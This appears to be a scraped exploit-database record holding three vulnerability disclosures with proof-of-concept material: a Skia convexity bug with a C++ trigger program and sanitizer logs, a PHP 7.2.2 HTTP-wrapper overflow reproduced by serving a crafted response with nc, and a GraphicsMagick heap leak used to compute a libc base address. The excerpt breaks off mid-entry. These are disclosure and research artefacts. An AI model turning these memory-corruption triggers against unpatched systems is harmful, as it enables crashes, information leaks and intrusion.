https://bugs.chromium.org/p/chromium/issues/detail?id=850350. 
What happens there is walk_convex_edges() being used on a concave path:\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?l=213&rcl=61c5108108acaeb4ee7fc8cb97c41f4f97d99040\r\nThis leads to breaking another Skia assumption - that the image is always going to be rendered in the top-to-bottom, left-to-right order.\r\nIf the path is used as a clipping region, this leads to incorrect ordering of runs in SkRgnBuilder. When the correspoding SkRgnClipBlitter is used, the \"left < right\" assumption gets broken here\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkBlitter.cpp?l=612&rcl=b2a232fb20358ccd6c7c2fafb7e83e444e4e2458\r\nwhich results in calling SkAlphaRuns::Break with the negative \"count\" argument, which leads to out-of-bounds write here:\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=154\r\n\r\nThe following Skia program demonstrates the issue:\r\n\r\n=================================================================\r\n\r\n#include <stdio.h>\r\n\r\n#include \"SkCanvas.h\"\r\n#include \"SkPath.h\"\r\n#include \"SkBitmap.h\"\r\n#include \"SkRegion.h\"\r\n\r\nint main(int argc, char * const argv[]) {\r\n\r\n SkBitmap bitmap;\r\n bitmap.allocN32Pixels(24, 24);\r\n SkCanvas canvas(bitmap);\r\n\r\n SkPaint paint;\r\n paint.setAntiAlias(true);\r\n paint.setStyle(SkPaint::kFill_Style);\r\n\r\n // This is monotone in both x and y, but has a tiny concavity\r\n SkPath path;\r\n path.moveTo(-1,-1);\r\n path.lineTo(0, 0);\r\n path.lineTo(0, 0.5e-10);\r\n path.lineTo(0.1e-10, 1.1e-10);\r\n path.lineTo(1.5e-10, 1.1e-10);\r\n path.lineTo(1.5e-10, 2.5e-10);\r\n path.lineTo(0.9, 1);\r\n path.lineTo(-1, 1);\r\n path.close();\r\n\r\n // If asked, Skia is going to declare it convex\r\n if(path.isConvex()) {\r\n printf(\"convex\\n\");\r\n } else {\r\n printf(\"not convex\\n\");\r\n }\r\n\r\n // The convexity flag is going to survive all affine 
transforms\r\n // Even those that will enlarge the concavity and make the path\r\n // non-monotone.\r\n SkMatrix m;\r\n m.setRotate(-45);\r\n m.postScale(10e10, 10e10);\r\n m.postSkew(-1, 0);\r\n m.postTranslate(1, 10);\r\n path.transform(m);\r\n\r\n // As demonstrated here\r\n if(path.isConvex()) {\r\n printf(\"convex\\n\");\r\n } else {\r\n printf(\"not convex\\n\");\r\n }\r\n\r\n // We'll use the path as a clip region\r\n canvas.clipPath(path);\r\n\r\n // And now we'll just draw a simple triangle.\r\n SkPath path2;\r\n path2.moveTo(15.5, 15);\r\n path2.lineTo(50.5, 50);\r\n path2.lineTo(-19.5, 50);\r\n path2.close();\r\n canvas.drawPath(path2, paint);\r\n\r\n printf(\"done\\n\");\r\n\r\n return 0;\r\n}\r\n\r\n=================================================================\r\n\r\nASan log:\r\n\r\n=================================================================\r\n==139872==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc5c8950d4 at pc 0x00000135512e bp 0x7ffc5c894f30 sp 0x7ffc5c894f28\r\nWRITE of size 1 at 0x7ffc5c8950d4 thread T0\r\n #0 0x135512d in SkAlphaRuns::Break(short*, unsigned char*, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkAntiRun.h:154:26\r\n #1 0x135512d in SkRgnClipBlitter::blitAntiH(int, int, unsigned char const*, short const*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.cpp:615\r\n #2 0xac437f in SkBlitter::blitAntiH2(int, int, unsigned int, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.h:96:15\r\n #3 0x1465fa4 in blit_trapezoid_row(AdditiveBlitter*, int, int, int, int, int, int, int, unsigned char, unsigned char*, bool, bool, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp\r\n #4 0x1465fa4 in aaa_walk_convex_edges(SkAnalyticEdge*, AdditiveBlitter*, int, int, int, int, bool) 
/usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1187\r\n #5 0x1465fa4 in aaa_fill_path(SkPath const&, SkIRect const&, AdditiveBlitter*, int, int, bool, bool, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1669\r\n #6 0x1465fa4 in SkScan::AAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1713\r\n #7 0xad5687 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AntiPath.cpp:844:9\r\n #8 0xad6cf6 in SkScan::AntiFillPath(SkPath const&, SkRasterClip const&, SkBlitter*, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AntiPath.cpp:883:9\r\n #9 0x9c5902 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.cpp:1018:5\r\n #10 0x9c64b9 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.cpp:1101:11\r\n #11 0x13478f3 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.h:56:15\r\n #12 0x13478f3 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBitmapDevice.cpp:407\r\n #13 0x98e9ce in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkCanvas.cpp:2141:23\r\n #14 0x983f71 in SkCanvas::drawPath(SkPath const&, SkPaint const&) 
/usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkCanvas.cpp:1694:11\r\n #15 0x69add0 in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../example/SkiaSDLExample.cpp:63:10\r\n #16 0x7ff1044112b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n #17 0x5ab0e9 in _start (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/SkiaSDLExample+0x5ab0e9)\r\n\r\nAddress 0x7ffc5c8950d4 is located in stack of thread T0 at offset 52 in frame\r\n #0 0xac421f in SkBlitter::blitAntiH2(int, int, unsigned int, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.h:87\r\n\r\n This frame has 2 object(s):\r\n [32, 38) 'runs'\r\n [64, 66) 'aa' <== Memory access at offset 52 underflows this variable\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkAntiRun.h:154:26 in SkAlphaRuns::Break(short*, unsigned char*, int, int)\r\nShadow bytes around the buggy address:\r\n 0x10000b90a9c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90a9d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90a9e0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 f2\r\n 0x10000b90a9f0: f2 f2 f2 f2 04 f2 04 f3 00 00 00 00 00 00 00 00\r\n 0x10000b90aa00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x10000b90aa10: 00 00 00 00 f1 f1 f1 f1 06 f2[f2]f2 02 f3 f3 f3\r\n 0x10000b90aa20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90aa30: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90aa40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90aa50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90aa60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow 
byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==139872==ABORTING\r\n\r\n################################################################################\r\n\r\nAnother variant of this issue can be triggered while rendering a concave path with SkScan::SAAFillPath algorithm.\r\n\r\nWhen drawing a path with SkScan::SAAFillPath, if the path is concave but Skia thinks it's convex, this can lead to SuperBlitter::blitH without respecting the the top-to-bottom, left-to-right order. In this case, this leads to SkAlphaRuns::add also being called out-of-order, which leads to SkAlphaRuns::Break being called with a negative \"x\" argument, which leads to uninitialized memory being read here:\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&l=150&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c\r\nWhich then leads to out-of-bounds reads/writes on the following lines:\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=154\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=155\r\n\r\nThis issue is also triggerable in Chrome by simply drawing a path to the canvas.\r\n\r\nSkia and Chrome PoCs are attached.\r\n\r\n\r\nMSan log from Skia:\r\n\r\n==55058==WARNING: MemorySanitizer: use-of-uninitialized-value\r\n #0 0xcb9188 in SkAlphaRuns::Break(short*, unsigned char*, int, int) 
/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAntiRun.h:155:17\r\n #1 0xcb9188 in SkAlphaRuns::add(int, unsigned int, int, unsigned int, unsigned int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAntiRun.h:83\r\n #2 0xcb9188 in SuperBlitter::blitH(int, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:251\r\n #3 0xce2e0e in walk_convex_edges(SkEdge*, SkPath::FillType, SkBlitter*, int, int, void (*)(SkBlitter*, int, bool)) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_Path.cpp:278:30\r\n #4 0xce0b79 in sk_fill_path(SkPath const&, SkIRect const&, SkBlitter*, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_Path.cpp:488:9\r\n #5 0xcbc6f3 in SkScan::SAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:737:9\r\n #6 0xcbe0a2 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:852:9\r\n #7 0xb02720 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1018:5\r\n #8 0xb03efc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1101:11\r\n #9 0x19efe03 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.h:56:15\r\n #10 0x19efe03 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) 
/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBitmapDevice.cpp:407\r\n #11 0xab09cb in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:2141:23\r\n #12 0xaa0237 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:1694:11\r\n #13 0x62077d in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../example/SkiaSDLExample.cpp:52:10\r\n #14 0x7f8901e5f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n #15 0x5af729 in _start (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/SkiaSDLExample+0x5af729)\r\n\r\n Uninitialized value was created by a heap allocation\r\n #0 0x5b799c in __interceptor_malloc (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/SkiaSDLExample+0x5b799c)\r\n #1 0xdb06dd in sk_malloc_flags(unsigned long, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/ports/SkMemory_malloc.cpp:71:13\r\n #2 0xb0b9c7 in sk_malloc_throw(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../include/private/SkMalloc.h:59:12\r\n #3 0xb0b9c7 in SkAutoMalloc::reset(unsigned long, SkAutoMalloc::OnShrink) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAutoMalloc.h:53\r\n #4 0xb0b9c7 in SkBlitter::allocBlitMemory(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBlitter.h:137\r\n #5 0xcb6c9d in SuperBlitter::SuperBlitter(SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:159:32\r\n #6 0xcbc648 in SkScan::SAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) 
/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:736:22\r\n #7 0xcbe0a2 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:852:9\r\n #8 0xb02720 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1018:5\r\n #9 0xb03efc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1101:11\r\n #10 0x19efe03 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.h:56:15\r\n #11 0x19efe03 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBitmapDevice.cpp:407\r\n #12 0xab09cb in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:2141:23\r\n #13 0xaa0237 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:1694:11\r\n #14 0x62077d in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../example/SkiaSDLExample.cpp:52:10\r\n #15 0x7f8901e5f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n\r\n################################################################################\r\n\r\nA third variant of this, which is also exploitable in Chrome (I just linked to the ClusterFuzz testcase) is when a path is rendered SkScan::SAAFillPath with a MaskSuperBlitter. 
In this case, rendering concave path as convex leads to \"x\" coordinate being increased beyond the image bounds, which leads to incrementing out-of-bounds data in\r\nhttps://skia.googlesource.com/skia/+/fa7df23d8b0c4121adfc5ad45c295e7077fad3f5/src/core/SkScan_AntiPath.cpp#483\r\n\r\nNote: ptr normally points inside\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_AntiPath.cpp?type=cs&g=0&l=435&rcl=05caa69a3f5aa45fd230ec302e6da1522d993747\r\nwhich is (in this case) allocated on the stack, so this variant gives us a stack out-of-bounds increment by a chosen small value, which is a pretty nice exploitation primitive.\r\n\r\nPoCs for Skia and Chrome are attached.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46332.zip\n\n# 0day.today [2019-02-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32141"}, {"lastseen": "2018-06-06T21:48:51", "bulletinFamily": "exploit", "description": "Exploit for php platform in category dos / poc", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "1337DAY-ID-30541", "href": "https://0day.today/exploit/description/30541", "title": "PHP 7.2.2 - php_stream_url_wrap_http_ex Buffer Overflow Exploit", "type": "zdt", "sourceData": "Description:\r\n------------\r\nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:\r\n \r\nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n \r\n if (tmp_line[tmp_line_len - 1] == '\\n') {\r\n --tmp_line_len;\r\n if (tmp_line[tmp_line_len - 1] == '\\r') {\r\n --tmp_line_len;\r\n }\r\n}\r\n \r\nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. 
Under ASAN a segfault can be observed.\r\n \r\n$ bin/php --version\r\nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )\r\nCopyright (c) 1997-2018 The PHP Group\r\nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies\r\n \r\n \r\nTest script:\r\n---------------\r\n$ xxd -g 1 poc\r\n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..\r\n \r\n$ nc -vvlp 8080 < poc\r\nListening on [0.0.0.0] (family 0, port 8080)\r\nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)\r\nGET / HTTP/1.0\r\nHost: localhost:8080\r\nConnection: close\r\n \r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n \r\nExpected result:\r\n----------------\r\nNO CRASH\r\n \r\nActual result:\r\n--------------\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n=================================================================\r\n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac\r\nREAD of size 1 at 0xbfc038ef thread T0\r\n #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979\r\n #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027\r\n #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550\r\n #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224\r\n #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573\r\n #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731\r\n #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760\r\n #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082\r\n #9 0x8cbaf66 in zend_eval_stringl_ex 
/home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123\r\n #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134\r\n #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042\r\n #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404\r\n #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\r\n #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)\r\nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:\r\n This frame has 13 object(s):\r\n [32, 36) 'transport_string'\r\n [96, 100) 'errstr'\r\n [160, 164) 'http_header_line_length'\r\n [224, 232) 'timeout'\r\n [288, 296) 'req_buf'\r\n [352, 360) 'tmpstr'\r\n [416, 432) 'ssl_proxy_peer_name'\r\n [480, 496) 'http_header'\r\n [544, 576) 'buf'\r\n [608, 736) 'tmp_line'\r\n [768, 1792) 'location'\r\n [1824, 2848) 'new_path'\r\n [2880, 3904) 'loc_path'\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex\r\nShadow bytes around the buggy address:\r\n 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4\r\n 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00\r\n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00\r\n 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2\r\n 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one 
shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap righ redzone: fb\r\n Freed Heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==26249== ABORTING\r\nAborted\n\n# 0day.today [2018-06-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/30541"}, {"lastseen": "2018-04-03T00:19:14", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "href": "https://0day.today/exploit/description/28948", "id": "1337DAY-ID-28948", "type": "zdt", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow Exploit", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n \r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. 
Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n \r\nThe vulnerabilities found are:\r\n \r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n \r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n \r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n \r\n \r\nVulnerabilities details\r\n \r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file.\r\n \r\nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image.\r\n \r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n \r\nThe code which triggers the vulnerable code path is:\r\n \r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 {\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 
j;\r\n737\r\n738 (void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n \r\n \r\nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8\r\n \r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked.\r\n \r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n \r\n \r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n \r\n \r\nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file.\r\n \r\n \r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n \r\n \r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.\r\n \r\n \r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n \r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n \r\nProof of Concept\r\n \r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] 
